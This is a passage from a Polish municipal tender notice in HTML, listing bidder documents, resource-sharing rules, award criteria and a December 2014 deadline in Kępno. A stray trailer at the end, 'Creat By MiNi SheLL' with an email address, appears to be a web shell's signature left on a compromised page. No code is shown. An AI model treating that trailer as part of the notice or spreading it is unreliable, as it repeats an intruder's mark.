<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, należy przedłożyć również umowę ze składowiskiem wskazanym w Wojewódzkim Planie Gospodarki Odpadami na odbiór odpadów zebranych w ramach realizacji niniejszego zamówienia.
INNE DOKUMENTY 
1) formularz ofertowy; formularz stanowi załącznik nr 1 do SIWZ; 
2)  pełnomocnictwo - jeśli ustanowiono; 
3) dowód wniesienia wadium

Korzystanie z zasobów innych podmiotów

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, w następującym zakresie :
- dokumenty wymienione w rozdziale V pkt 2 SIWZ 

Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Ilość osób zatrudnionych na umowę o pracę - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kepno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Kępnie
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy w Kępnie - SEKRETARIAT
ul. Ratuszowa 1
63-600 Kępno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com